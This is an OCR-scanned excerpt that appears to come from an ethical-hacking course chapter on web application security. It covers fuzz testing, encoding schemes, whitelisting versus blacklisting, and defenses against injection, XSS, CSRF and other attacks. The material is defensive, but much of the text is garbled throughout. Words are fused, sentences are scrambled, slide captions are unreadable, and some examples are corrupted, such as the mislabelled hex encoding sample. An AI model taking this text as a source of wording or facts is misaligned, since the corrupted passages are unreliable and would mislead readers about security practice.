andweb developers
and immunityof the developed
injection,
web

Steps
of FuzzTesting
Webapplicationfuzztestinginvolvesthe following steps:
=
Identify targetsystem
the
=

*
Identify
Generate
inputs
fuzzeddata
Execute the test using fuzzdata
=

Monitor behavior
system
Log

FuzzTesting
defects
Strategies
‘=
Mutation-Based:In this typeof testing,the current datasamples create new test data,
andthe new test datawill againmutate to generate furtherrandomdata.Thistypeof

a sample
testingstarts with valid
mutating
until
andkeeps

ical
the targeti s reached,

andCountermensores ©
Mackin by E-Comel
Copyright
 Generation-Based:In thistypeof testing,the new datawill be generated fromscratch,
andthe amount of datato be generated is predefined
basedon the testingmodel
Protocol-Based:
In this typeof testing,the protocolfuzzersendsforged packets
to the
targetapplication
that is to be tested.Thistypeof testingrequiresdetailedknowledge
of the protocolformat beingtested. It involves writinga list of specificationsinto the
fuzzertool and then performing the model-based test generation technique to go
through all the listed specifications
and add the irregularities i n the data contents,
sequence,etc
FuzzTesting
Scenario
Thediagram

httprequests
of
belowshowsan overview of the main componentsthe fuzzer.Anattackerscript
is fed to the fuzzer,whichin turn translatesthe attacksto the targeta s httprequests.
will get responsesfromthe targetandall the requests
These
andtheir responsesare
thenlogged
formanualinspection,

> uss Program o> MITPClient

logs

Figure fuzztesting
14.99:Web application scenario

Tools:
FuzzTesting
=
(https://www.owasp.ora)
WsFuzzer
=
(https://www.owasp.org)
WebScarab
+
BurpSuite(https://portswigger-net)
HCLAppScan®
Standard(hetps://www.heltech.com)
(https’//www.peach.tech)
PeachFuzzer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SourceCodeReview
1GSourcecodereviews
ae usedto detec hugs
andregularities webappleations
i n developed

|@ keane
performed
oF manualybyautomated
autheestion,
regarding
tol to ent specie
seston management,ad dt validation
area inthe aplationcade thathanlefuneions

©Irean
identity
vulnerabilities
nonadated
wel
poor
codingthat
alow
to dat s as developers
techniques attaches
to

Fodbac Of rae oy

SourceCode Review
Sourcecode reviews are usedto detectbugs
and irregularities
i n the developed
web
applications.
Theycan be performed manually or using automatedtools to identify specific
areas i n the applicationcode to handle functionsregarding authentication, session
management, anddatavalidation.They
c an identify
un-validateddatavulnerabilitiesand poor
coding
techniques
ofdevelopers
that allowattackers
Manual CodeReview
to
exploit
applications.
theweb
AutomatedCodeReview

mee
Nosy
Mosty

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Schemes
Encoding 43H
|G Web applicationsemploy
diferentencoding fortheirdatat o safely
schemes handle
unusual and
characters
binary
data
way in the you intend

of Encoding
‘Types Schemes

HTML, ies eves TIL ete to represent wal characte has

Encoding # toro. &

Encoding
Schemes(Cont'd)
UnicodeEncoding Base64Encoding

stucmenfo example

sample: Ison 1230684409

eeeetekense
Sitone @
Encoding
Schemes
Encodingis the processof converting
source information into its equivalent
symbolicform,
which helps i n hiding
the meaningof the data. At the receivingend,the encodeddata is
decoded into the plaintextformat.Decoding is the reverse processof encoding. Web
applicationsemploydifferent encoding schemesfor their data to safely handle unusual
anddata
characters binary i n the intendedmanner.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Encoding
Types Schemes
=
URLEncoding
Webbrowsers/web servers permitURLsto contain onlyprintable characters of ASCII
code that can be understood bythemfor addressing.
URLencoding is the processof
converting a URLinto a validASCIIformat so that data can be safely transported over
HTTP.Several characters i n thisrangehavespecialmeaningswhenthey a re mentioned
i n the URLscheme
replaces unusual
codeexpressed
or HTTP protocol.
ASCIIcharacters
i n thehexadecimal
Thus,
with "%6"
format,suchas:
are
thesecharacters restricted.URLencoding
followedbythecharacter'stwo-digitASCII

HTMLencoding
‘An schemeis usedto represent
unusual so that they
characters c an be

safely andocument.
combined
encoding
within HTML
withstringsthat can be recognized
HTML replaces
whilethevarious characters
unusualcharacters
definethestructure of
the document.If you want to use the same charactersas thosecontainedi n the
document, you might encounter problems.Theseproblems can be overcome using
HTML encoding. It defines severalHTML entities to representparticularlyusual
characters
suchas:
>
kamp; &
0 alt; <

© sgt; >

UnicodeEncoding
Unicodeencoding 16-bitUnicodeencoding
is of two types: andUTF-8.
© 16-bitUnicodeEncoding
Itreplaces
unusualUnicode characters with "su" followedby the character's
Unicodecodepoint
expressedin thehexadecimal format.
© su22is /
uTr-8
It is a variable-length
encoding
standardthat expresses
eachbytei n the hexadecimal
formatandprefixes
it with %,
+ ac2%a9 ow
© 32889880

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Base64Encoding
The Base64encoding schemerepresents any binarydata usingonlyprintable ASCII
In general,
characters. it is usedfor encoding
emailattachmentsfor safetransmission

‘over
SMTP
For also user
and
example:
for encodingcredentials,

cake 01100011011000010110101101100101
=

Base64Encoding:
011000 110110 000101 101011 011001 010000 000000
000000
Hex Encoding
The HTMLencoding schemeuses the hex value of every characterto represent
a
collectionofcharacters binary
fortransmitting data.
For,example:
Hello a125caseps
Jason 1238684aD9

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Whitelisting
vs. Blacklisting
Applications

Application Whitelisting Application

Blacklisting

{appliationcomponentssuchas software applications

malicious or software
that are
ibraris plgin, extensions,a ndconfiguration to beexecutedinthe
ot permitted

the unauthoried
ithelp i n preventing
andspreading
‘execution ofmalicious
programs
uel
thatcan in
blocking
caus
applications
malicious
potential
damage
or tack

that and
Daclitings method
a theeat-centee ast
iitelsting avoidsthe instalation
of threat
Cannotdetectmodeen results
or vulnrableaplication’
‘unapproved stacks lendtodts oe
iitelsing
provides
arate
rowing protection
malware
attacks
Honbilty
against
ransomunar
by
ot
e
forprotection
regularly
Ieisimpoctantte updatet hebacks
atestm alware
agains attacks

Whitelisting
vs. Blacklisting
Applications
Webapplicationshave played
an importantrole i n the adoption
of digital
transformation
‘globally.
Suchrapid
development
hasmotivatedattackersto compromise
system
security
using
techniques
different
theseattacks,
strategies.
that
exploit
theflawsand breaches
professionals
security need to implement
present i n the applications.
various security policies
To thwart
and testing

Whitelisting
andblacklistingis one suchsecurity strategythat can retain the applications,
networks, securely.
andinfrastructures Usingthis strategy,
shouldbe allowedand thosethat shouldbe blocked.
effectively
blockedbeforeit enters the organizational
one can create listof entities that
Thus,any malicioussoftwarecan be
network.
a
ApplicationWhitelisting
Applicationwhitelistingspecifiesa list of applicationscomponentssuchas software
libraries,
plugins,
extensions, and configuration
files,or legitimate
softwarethat can be
permitted
to execute i n the system.It helps unauthorizedexecution
i n preventing and
spreadingof maliciousprograms.It can also preventthe installationof unapproved or
Whitelisting
vulnerableapplications. provides byproviding
greaterflexibility protection
againstransomware andothertypesof malwareattackson web applications.

Application Blacklisting.
Application blacklisting
specifiesmaliciousapplications or softwarethat are not
permitted to beexecutedin the system or the network.Blacklisting can be performed
byblocking maliciousapplications
that can cause potential damage or lead to attacks.
Blacklisting
is a threat-centricmethod; i t cannot detectmodernthreatsand resultsi n
attacksleading to data loss.Hence,
it is important to update
the backlistregularly
to

ical andCountermensores
Mackin ©by E-Comel
Copyright
defendagainst
adding
the latestmalware
the names of applications attacks.
Application
to
blacklisting
can be performed
be blockedat the firewalllevelor installing
to blocktheapplications
software
by
specific

Blacklisting
and whitelisting
for basicURLmanagement
URLblacklisting
preventsthe user from loading
web pages from the blacklistedURLs.
URLwhitelisting
Theuser can accessall URLsexceptthosei n theblacklist. permitsthe
users to access onlyspecific
URLsas exclusionsto thosethat are addedto the URL
blacklist.
URLwhitelisting
is performed
usingthefollowing
methods:
Allow accessto all URLsexceptthe blockedones: Whitelisting
can allowthe users

of
to access the rest the networkapplications
Blockaccessto all URLsexceptpermitted
ones: Whitelisting
can permita ccessto a
limitedlistof URLs
Define exceptions
to very restrictiveblacklists:Whitelisting
lets users access
schemes, ofotherdomains,
subdomains specific
paths,or ports
Allow the browserto open applications:
Whitelisting
is performed
onlyfor specific
external protocol handlers so that the browser can automatically
execute
applications
URLblacklistingis performedusingthe following
methods:
© Allow access to all URLsexcept the blockedones: Blacklisting
preventsusers from
blockedwebsites
accessing
Blockaccess to all URLsexceptpermitted
ones: Blacklisting
blocksaccess to all
malicious
URLs
Defineexceptions Blacklisting
to very restrictive blacklists: restricts accessto all

URLs toattacks
that are vulnerable
Blacklisting
Allow the browser to open apps: preventsthe browserfrom
automatically
applications executing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Application
Whitelisting
Blacklisting and Tools
CEH

Minimal
andSimple
Threat
Intelligence
AntiAbuse
APIs

Application Whitelistingand Blacklisting Tools

Varioustoolsthat helpsecurity i n application
professionals whitelisting
and blacklisting
are
discussed
below:
=
Apility
Source:https://apility.io
Apility.io
domain, isaanti-abuse
n helps
professionals
of if address,
APIthat security
or emailof a user is blacklisted.
service―
to helpsecurity professionals,
to know theIP
itis a collection various toolsdelivered“as
product managers,IT shops,
a
and
enterprises,
start-upsto acquire more detailsabouttheir potential and
visitors,users, customers,
threatactors.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
16.102:
Screenshot
of Apt 0
Someadditionalapplication
whitelisting
and blacklisting
toolsare as follows:
+
AutoShun(https://www.autoshun.org)
=
(https://umbrella.cisco.com)
CiscoUmbrella
Alexa TopSites(https://aws.omazon.com)
APTGroups (https://docs.google.com)
andOperations
NordVPN(https://nordvpn.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst Attacks
Injection
SQL
Injection Attacks InjectionF laws
Command

File InjectionAttacks

LDAPS
(LDAP over st to secre communion he

Howto DefendAgainst Attacks(Cont'd)

Injection
Server-Side
JsInjection
Include
Server-Side Injection

sd
the wo
sng
the
use
val fanetionprs inpat

Server
SideInjection
Template hogInjection

‘aye
pss
namic atte

How to DefendAgainst InjectionAttacks

SQLInjection Attacks
© Limitthe lengththe user input

© Usecustom error messages

of
© Monitor DBtrafficusingan IDS,
WAF

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Disable suchas xp_cmdshell
commands
Isolatethe databaseserver andwebserver
Always andlow-privileged
use a methodattributeset for POST account for D8
connection
Runa databaseservice account with minimalrights
Moveextendedstoredprocedures
to an isolatedserver
Usetypesafe
variablesor functionssuchas to ensure typesafety
isNumeric()
Validate
andsanitizeuser inputs
passedto thedatabase
Avoidusingdynamic SQLanddo not construct querieswith theuser input
Useprepared parameterized
statements, queries,or storedprocedures
to access
the database
Display
lessinformationandusethe "RemoteOnly" modeto display
customErrors
verboseerror messageson the localmachine
andcharacterfiltering
Performproper escaping to avoidspecial characters,
string
andsymbols quotes(')
suchas single
Always
set thewhitelistlogically
insteadof the blacklistto avoidbadcode
UseObjectRelationalMapping
(ORM) frameworks to makethe conversion of SQL
resultsetsinto codeobjects
more consistent

Injection
‘Command Flaws
Thesimplest way to defendagainst commandinjection flawsis to avoidthemwherever
possible. Somelanguage-specific librariesperform identicalfunctionsfor manyshell
‘commandsandsome system calls.Theselibrariesdo not contain the operating system
shellinterpreter andhenceignoremaximum shellcommandproblems. For thosecalls
that must still be used,suchas callsto backenddatabases, one must carefully validate
the data to ensure that it does not contain maliciouscontent. One can also arrange
ina executable
various requests pattern,
datainsteadof
potentially
whichensuresthat all the givenparameters
content.
are treatedas

Most systems procedures

calland use stored with parameters valid input
that accept
stringsto accessa databaseor prepared
statements to provide
significant
protection,
ensuringthat the supplied inputis treated as data,which reducesbut does not
completely eliminatethe riskinvolvedin theseexternalcalls,Onecan always authorize
the inputto ensure the protection of the application
i n question.For this reason, it is
importantto use the least-privileged accounts to accessa databaseto minimize the
attackpossibility
‘Another
robustmeasure against
command
injection
i s to run webapplications
with the
privilegesrequired to carryout their functions.Therefore,
one shouldavoidrunningthe
web server as a root or accessinga database otherwise,
as a DBADMIN; an attackermay

ical andCountermensores
Mackin ©by E-Comel
Copyright
be able to misuse administrative rights.
The use of Java sandboxi n the J26€
environment stopsthe execution of system
commands. Externalcommands are usedto
ccheckthe user information
whenhe/she provides
it, Createa mechanismfor handling
all possible
errors, timeouts,or blockages
during the calls.Checkall the output,return,
anderror codesfromthe callto ensure that it performs as expected, Doings o allows
users to determinewhether something hasgone wrong. Otherwise, an attack might
occur andnever bedetected.
‘Some command
countermeasuresagainst flawsare as follows:
injection
©.

2
Performinput
Escape
dangerous
validation
characters
>
Use language-specific
librariesthat avoidproblems
dueto shellcommands
Performinputandoutputencoding
Usea safeAPIthatavoidsuse ofthe interpreter
entirely
so thatall supplied
Structurerequests are treatedas dataratherthan
parameters
potentially
executablecontent
Useparameterized SALqueries
Usemodularshelldisassociation
fromthekernel
Usebuilt-inlibrary
functionsandavoidcalling directly
OScommands

‘commandsthe
Implementleastprivileges
to restrict the permissionsto execute the OS

Avoid executing
commands
suchas exec or without proper validationand
system
sanitization
usingpent|_fork
Preventthe shellinterpreter andpentl_exec
withinthe PHP
Implement
Python insteadof PHPfor application
asa webframework development
LDAP
Injection
LDAPinjection
‘An
Attacks
attackson web applications
attackis similarto an SQLinjection: co
the user inputto create LDAPqueries.Executionof maliciousLDAPqueriesin the
‘opt
applications
creates arbitrary
queriesthat discloseinformationsuchas username and
password,
thusgranting a ccessandadmin
attackersunauthorized privileges.
Somecountermeasuresagainst
LDAPinjection
attacksare as follows
© Performtype,pattern, anddomainvaluevalidationon all inputdata
©.

©.
Make
LDAPspecific
the
Validate
filter as as possible

andrestrict theamount ofdatareturned

to the user
Implementtighta ccesscontrolo n the datain theLDAPdirectory
Performdynamic testingandsource codeanalysis
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Sanitizeall theuser-endinputsandescapeanyspecial
characters
LDAPsearchfiltersbyconcatenating
Avoid constructing strings
UsetheANDfilter to enforcerestrictions on similarentries
UseLDAPS(LOAP
over SSL)
for encrypting
andsecuringthe communication on the
web servers
FileInjection
Attacks
Attackersuse scripts maliciousfiles into the server, allowing
to inject them to exploit
vulnerable parametersandexecute maliciouscode.Suchan attackallowstemporary
datatheft anddata manipulation,
andit can provide attackerswith persistent
controlof
theserver.
‘Some attacksare as follows:
file injection
countermeasuresagainst
©.

©
Strongly user
validatethe
implementing jail
Consider a
input
chroot
© allow_url_fopen
PHP:Disable allow_url_include
php.ini
and in

©

©
PHP:Disable
and to find
register_globalsE_STRICT use
PHP:Ensurethat ll fle andstream functions(stream_*)
are carefully
uninitialized
vetted
variables

JSInjection
Server-Side
inputsare strictly
Ensurethat user validatedo n the server sidebeforeprocessing

using
‘Avoid theeval()
Neveruse commands
function
having
to parsetheuser input
identicaleffects,suchas setTimeOut(), setintervall),
andFunction()
UseJSON.parse()
insteadof eval()
to parsethe JSONinput

Makesure to include“use at the beginning

strict― ofthefunction
to enablethe strict
modeinsidethefunctionscope
IncludeInjection
Server-Side
© Validate
theuser inputandensure thatit doesnot include
characters
usedi n SSI
directives
ApplyHTML encoding to the user input
beforeexecuting
it i n theweb pages
Ensurethat directivesa re confinedonly
to theweb pageswherethey are required

Avoid
using
with
file
pages
preventattacks
nameextensions
such
.shtm,
as
to
.stm, and .shtml

Template
Server-Side Injection
© Donot create templates
fromuser inputsor passuser inputsas parameters
into the
templates
ical andCountermensores
Mackin ©by E-Comel
Copyright
© Useasimple
template or Python's
enginesuchas Mustache template
if thebusiness
templates
supportuser-submitted
requirements
Reviewthe template for hardening
documentation
engine’s tips
Executethe template
insidea sandboxed
environment
©

©.
Consider
template
Always
possible
loading
static
makesure to passdynamic
files wherever
datato a template
using the template
engine's,
built-infunctionality
Loginjection
o
©
Passlogcodesinstead
andeasily
Usecorrect error codes
through
of messages parameters
recognizable
error messages
© AvoidusingAPIcalsto ogactionsdueto theirvisibility
i n browsernetwork
cals,
Makesure to passuser IDsor publicly
non-identifiable as the parameters
inputs at
logging
endpoints
Validateinputsat boththe server sideandtheclientsideandsanitizeandreplace
themalicious
characters

Injectionfor that
© carefullyany vulnerabilities
Examinethe application are usedto renderlogs

HTML
to
Validateallthe user inputs
supplied
text
remove substrings
the HTML-syntax fromuser-

the inputsfor unwantedscriptor HTMLcodesuchas <script></script>,

Check
<html></htmi>
© Employ anddetectpossible
solutionsthat avoidfalsepositives
security injections
Injection
CRLF
©. Useanyfunctionto encodeCRLFspecial
characters
andavoidusingthe user inputi n
the response
headers
Updatetheversion ofthe programming language ofCR
thatdisallowsthe injection
(carriage
return)
andLF(linefeed) characters
Rewritethe codeso thatthe user'scontent is not directly
usedi n the HTTPstream
Checkandremove any newlinestringsi n the content beforepassingit to the HTTP
header
the datathat is passed
Encrypt to theHTTP to manipulate
headers the CRandLF
codes

ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
AttackCountermeasures
BrokenAuthenticationand SensitiveData Exposure
Donat cant or ue

weakeryptopr gets
se

hated
oredina orm
true aa sored on aki a ey

‘XML
External Entity

WebApplication
AttackCountermeasures(Cont'd)

Security
Misconfiguration XSSAttacks

ae et Gea
os
Coan
3

analpanuac

sai
eSSL Peete on SHOESKORNOY
gab
Coan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
AttackCountermeasures(Cont'd)

Inrecure ingComponents
with

7
WebApplication
AttackCountermeasures(Cont'd) EH
protected
aresbtn access rights
othe ofthewebsite

| 9
‘Traversal
iactory Aeshna
toate thedetory tera
nett cha Ucd

ld usingrere nd forwards

Watering patches
remave
any
eeuay aly oftware to wneabtes

secure
to the
ste
. nt

|
aitatering
the ONSsere peor

Analytesar behavior
atc om edeeting

Module4 1972
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 WebApplication
AttackCountermeasures(Cont'd)

©HTTP
wu
Forgerybromer
and
webstes
Tequest |
to
soveloh
FST,
Donotalow

URL
‘chekthe tere ander ad when posting
deta
ore parameters

|
Polsening be ® Theuthensaton
cede an cook shoud asocte

wen
cen ee docaent uthntcton cede tat we AN

WebApplication
AttackCountermeasures(Cont'd)

(Clickjacking
Attack JavaScript
Hijacking

Usethe
content
ser gale[CSPHTTPheader est

Username
Enumeration ‘Attack
on Password
R esetM echanism

rrr
WebApplication Attack Countermeasures
Broken Authentication andSession Management
Flaws authenticationand
i n session application
management functionsallowattackers
to gain passwords,keys,and session tokensor exploitother implementation
vulnerabilitiesto gainotherusers’
credentials.

Module8 Page ical andCountermensores

Mackin ©by E-Comel
Copyright
Sessioncookiesare destinedfor clientIPs bydelivering a validation cookie,which
includesa cryptographic
token that verifiesthat the clientIP is the one to whichthe
sessiontoken was issued.Therefore,to perform the sessionattack, theattackermust
steal of
‘Some
the
target
user.
theIPaddress
brokenauthenticationand session
countermeasuresagainst attacks
management
are
as follows:
©

9
Use
SSL
for parts
Verify
of
the
application
al authenticated
whetheral the users’
identitiesandcredentialsa re storedi n a hashedform
> Neversubmitsession dataas partof a GET,POST
‘Apply
passphrasing withatleast
f ive randomwords
attemptsandlockthe account for a specific
Limitthe login period
after a certain
of
number failed attempts
Usea secure platform
to longrandomsessionidentifiers
sessionmanager generate
for secure session development
Implement
multi-factarauthenticationmechanisms
to prevent credential
guessing,
stuffing,
andbrute-forcing
Makesure to secure passwords
with a cryptographic
password
hashalgorithm
or
toolssuchas berypt,
scrypt,
or Argon2

©

©
Make
sure passwords
against
listprobable
to check
Logauthentication
weak a of the topbadpasswords
failuresandsendalertswhenever attacksare detected
SensitiveDataExposure
Manyweb applications do not properlyprotectsensitive data suchas credit card
numbers, SSNs, andauthenticationcredentialswith appropriateencryption or hashing.
may stealor modify
‘Attackers suchweakly protected data to conductidentity theft,
creditcardfraud,or othercrimes.
Somecountermeasuresagainst
sensitive dataexposureattacksare as follows:
© Donot create or use weakcryptographic
algorithms
© Generate keys
encryption offlineandstore themsecurely
© Ensurethat encrypted
datastoredon thediskis not easyto decrypt
UseAESencryption (HTTP
forstoreddataanduse TLSwith HSTS StrictTransport
Security)
for incoming traffic
Classify
the dataprocessed,
stored, or transmitted bya n application
andapply
controls
accordingly
UsePCIDSScompliant
tokenizationor truncation to remove the datasoon after its
requirement

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Useproperkey management a re in place
andensure thatall the keys
Encrypt
all the datain transit usingTLSwith PerfectForwardSecrecy (PFS)
ciphers
Disablecaching
techniques
for requests
that contain sensitive information
XML ExternalEntity
Avoidprocessing references
XMLinputcontaining entities bya weakly
to external
configured
XMLparser
XML
unmarshaller
should
configured
securely
securely
be
configured
Parsethedocumentwith a parser,
Configure
theXMLprocessor
to use locals tatic DTDanddisable
anydeclared
DTD
includedin an XMLdocument
Implement
whitelisting,
input
validation, andfiltering
sanitation,
preventhostiledatawithintheXMLdocuments
techniques
to

Updateandpatch the latestXMLprocessorsandlibraries

Makesure that the XML/XLS file upload
funetionvalidatesthe XML usingXSO
validation
BrokenAccess
Control
©. Performaccess controlchecksbeforeredirecting
the authorizeduser to the
requested
resource
‘Avoid
usinginsecure IDsto preventtheattackerfromguessing
them
Providea session timeout mechanism
Limit file permissionsto authorizedusers to avoidmisuse

caching
Avoid client-side mechanisms
s essiontokenson the server sideon user logout
Remove
Ensurethat minimum privileges
are assigned
to usersto perform
onlyessential
actions
Enforce once andre-use themthroughout
accesscontrolmechanisms the
application
Misconfiguration
Security
Securitymisconfiguration potentially
makesweb applications vulnerableand may
provide
attackerswith access to them as well as to files and other application-
controlling layerprotection
functions.Insufficienttransport allowsattackers to obtain
unauthorized a s well as to perform
access to sensitive information attackssuchas
account theft,phishing,
andcompromising adminaccounts.Encrypt all communications
betweenthe websiteand client to preventattacksdue to insufficient
transportlayer
protection.

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Some
countermeasuresagainst misconfiguration
security attacksare as follows:
Configure
all security
mechanisms anddisableall unusedservices
Setup
roles,
permissions,andaccountsanddisableall defaultaccountsor change
their defaultpasswords
vulnerabilitiesandapply
Scanfor the latestsecurity patches
thelatestsecurity
Non-SSL to web pagesshouldberedirectedto theSSLpage
requests
flagon all sensitive cookies
Set the ‘secure’
Configure
the SStprovider to supportonlystrongalgorithms
is validandnot expired,
Ensurethatthe certificate andthat it matches
alldomains
usedbythe site
0 Backend technologies
andotherconnectionsshouldalsouse SSLor otherencryption
XSSAttacks
XSSis anothertypeof inputvalidation attacksthat targetthe flawedinputvalidation
mechanism of web applications
for the purpose of maliciousactivities. Attackersembed
maliciousscriptinto web application
‘a inputgates,whichallowsthem to bypass the
measures imposed
security bythe applications.
‘Some XSSattacksare
countermeasuresagainst as follows:
©
all
Validate
headers,
parameters) cookies,
query
strings,
fields,
hidden
fields
(i..,
all
a rigorous specification
against
form and

Use
thetesting
toolsextensively
application
during
the design
beforeit goesinto use
phase
to eliminatesuchXSSholesi n

Usea webapplication
firewallto blockthe executionof a malicious
script

displaying HTML
character
Convertall non-alphanumeric characters
the user inputin search
into
enginesandforums
entities before

Encodeand
the inputandoutput filtermetacharacters
Nevertrust websitesthat use HTTPS
in the input
whenit comes to XSS
Filtering
the scriptoutputcan alsodefeatXSSvulnerabilitiesbypreventing
them
frombeingtransmittedto users
Deploypublic for authentication,
keyinfrastructure(PKI) whichchecksto ascertain
introducedis actually
that the script authenticated
Implement
a stringent policy
security
Webservers, application servers, andweb application environments are vulnerable
It is difficult to identify
to cross-site scripting. and remove XSSflawsfrom web
applications.Thebestwayto findflawsis to perform a securityreview of the code

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and searchin all the places
wherethe inputfroman HTTPrequestcomes as an
outputthrough HTML.
>
Attackeruses a varietyof HTML tagsto transmit a maliciousJavaScript. Nessus,
Nikto,andothertoolscan helpto some extent in scanningwebsitesfor theseflaws.
i n a website,it is highly
If the scanningdiscoversa vulnerability likelyto be
vulnerableto otherattacks.
Reviewthewebsitecodeto defendagainst XSSattacks.Checkthe robustness of the
codebyreviewingit and comparingit against exact specifications. Checkthe
following areas: headers,cookies,
querystringformfields, andhiddenfields.During
the validationprocess, there must be no attempt to recognize the active content,
either byremovingthefilter or bysanitizingit.
Thereare manyWaysto encodeknownfiltersfor active content. A “positive security
policy―
is highly recommended, whichspecifies whatis allowedandwhatmust be
removed.Negative or attacksignature-based policies
are difficult to maintain, as

theyare incomplete.
Inputfieldsshouldbe limited to a maximum size since most scriptattacksneed
severalcharacters
to initiate.
Implement Policy
Content Security (CSP) the browserfromexecuting
to prevent XSS
attacks
Escape
untrustedHTTPrequestdata built on the context i n the HTMLoutputto
resolveReflectedandStored XSSvulnerabilities
Employ whenaltering
context-sensitive encoding the browserdocumento n the
clientside,
whichactsagainst
the DOM-XSS
Insecure Deserialization
Validate
untrusted
inputthatis to beserializedto ensure that theserializeddata
contains only
trustedclasses

of
Deserializationtrusted datamust cross
Developers must re-architect
a

theirapplications
trust boundary

‘Avoid forsecurity-sensitive
serialization classes
Guardsensitive dataduring
deserialization
Filteruntrustedserialdata
Enforceduplicate
deserialization
security
manager
checks
during in a class serializationand

Understand
the security
permissionsgiven to serialization
anddeserialization
Implement checksor encryption
integrity objects
of the serialized data
to prevent
modification
or hostileobject
creation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Isolatecodethat deserializes
so that it runs in very-low-privileged
environments
Logthedeserialization andfailuresso that the incomingtypeis not the
exceptions
the expected
same as type;otherwise,it throwsan exception
Using withKnownVulnerabilities
Components
Regularly
checkthe versions of bothclient-sideandserver-side and
components
their dependencies
Continuously Vulnerability
monitor sourcessuchas theNational (NVB)
Database for
vulnerabilitiesin your components
Apply patches
security regularly
©

components
Scanthe
Enforce
security
scanners
frequently
with
andbestpractices
policies
security forcomponent
use
Reviewall the dependencies
including
transitive dependencies
andensure that they
are
notvulnerable
regular
Maintaina ofthe versions ofbothclient-side
inventory andserver-side
components regularly
Makesure to obtaincomponentsfromofficialsources andacceptonlysigned
packages
Insufficient
Logging
and Monitoring
© Definethe scopeof assetscoveredi n logmonitoring
to includebusiness
critical
areas
a minimum baseline
Setup for logging andensure thatitis followedforall assets
Ensurethat logs
a re logged
with user context so that theyare traceablefor specific

Ascertainwhatto logandwhatlogto lookforthrough incident

proactive
identification
Performsanitization on all event datato preventloginjection attacks
Implement a common logging
effectiveincidentresponse for
mechanism the wholeapplication anduse

Ensureall logins,
withthenecessary
access controlfailures,
input
and
user context to identify
validationfailurescan be logged
suspicious accounts
Makesure that high-value transactionsconsistof an audittrail with integrity

Traversal
Directory
of
controlsto preventtamperingthe databases suchas append-only databasetables

traversalenablesattackersto exploitHTTP,gain access to restricted

Directory
directories,
andexecute commands outsidethe webserver'sroot directory.
Developers

ical andCountermensores
Mackin ©by E-Comel
Copyright
must configure web applications fileanddirectory
andtheir servers with appropriate
permissionsto avoiddirectory
traversalvulnerabilities.
directory
Somecountermeasuresagainst traversalattacksare as follows:
© Definea ccessrights
to the protectedareas ofthe website

Applychecks/hotfixesthat preventexploitationof vulnerabilitiessuchas Unicode,

whichaffectthe directorytraversal
Webservers shouldbeupdated patches
with security i n a timely manner
Validate
the user inputbeforeprocessing
bycomparing i t withthewhitelistand
verify
that the input contains onlypurelyalphanumericcharacters
‘Append
the inputof the application
to the base anduse the platform
directory
filesystem
APIto canonicalize the path
Usean advancedcontent management system(CMS)for handingseveral
documents
Hostdocuments fileserver or cloudstorage
on a separate mixingof
to prevent
public
andsensitive documents
Properly
sanitize the file names comingfromHTTPrequests
Restrictfilenamesto a list ofknowngood andensure thatanyreferences
characters
to filesuse only
thesecharacters
UnvalidatedRedirects
andForwards
In general,
webapplications redirectand forwardusers to otherpagesandwebsites.
Therefore,
if a web applicationdoesnot validatethe data,thenattackerscan redirect
usersto
malicious
websites
to preventsuchattacks,
or use forwarding to accessunauthorized
it is best not to allow users to directly
redirectandforwardi n webapplication
logic.
pages.Therefore,
supply
parameters to

Somecountermeasures againstunvalidated
redirectsand forwardsattacksare as
follows
©. Avoid usingredirects
andforwards
© Ifthedestination
parameters ensure that the supplied
cannot beavoided, valueis
validandauthorizedfor the user
Avoid allowing
URLas a user inputfor thedestinationandvalidatetheURL
Sanitizethe inputbygenerating
a listof trustedURLsthat includes
a listof hostsor
regex
Implement
meta refreshi n the page, as it can use hardcodedHTMLto automatically
redirect
usersto another
page
Watering
HoleAttack
Applysoftwarepatches
regularly
to remove anyvulnerabilities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Monitor
network traffic
attackersfromredirecting
Securethe DNSserver to prevent the site toa new
location
Analyze
user behavior

websites
Inspect
popular
Usebrowserplug-ins
that blockHTTPredirects

Disablesuch
as content
third-party advertising
services, whichtrackuser
Makesure to hideonlineactivitieswith a VPNandenable
thebrowser's
private
activities

browsing
feature
Makesure to run thewebbrowseri n a virtualenvironment to limit access to the
localsystem
Request
Cross-Site Forgery
Usinga CSRF attack,attackerslure a user'sbrowserinto sending a fake HTTP request,
including
the user sessioncookieandotherauthentication information, to a legitimate
(vulnerable)
‘Some
webapplication to perform
countermeasuresagainst
malicious
activities.
forgery
cross-siterequest attacksare as follows:
©.
©
Logoff
immediately
after usinga web
Donot allowyour browser
application
andwebsiteto save login
the
history
andclear
details.
@POST,
ChecktheHTTPReferrerheaderandwhenprocessing ignoreURL
parameters
Usereferer
flag
that
suchas HttpOnly
headers
headerusingjQuery
a n X-Requested-With
sends custom

Use
CSRFnonce
tokens
tokenssuchas
fieldto avoidillegal
access
that are submittedthrough
the
hidden form

Cookie/Session
Poisoning
use cookiesto maintain a session state. They
Browsers alsocontain sensitive,
session-
specific
data (e.g.,
user IDs,passwords, linksto shopping
account numbers, cart
contents,supplied private information, and session IDs).Attackers engage i n
poisoningbymodifying
cookie/session the data i n the cookie to gainescalated
access or
maliciously
affecta user session.Developersmust hencefollow secure coding practices
to secure web applications againstsuch poisoningattacks.They must use proper
session-token
generation mechanismsto issuerandomsessionIDs
Somecountermeasuresagainst cookie/session
poisoning attacksare as follows:
© Do not store plaintext
or weakly passwords
encrypted i n cookies

©
cookie
Implement timeout

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cookieauthenticationcredentials
shouldbe associated
with an IP address
Makelogout
functionsavailable
Validateallthe cookievaluesto ensure that theyare well-formedandcorrect
Usevirus and malwarescanning
softwareto protectthe browserfromany malicious
that hijack
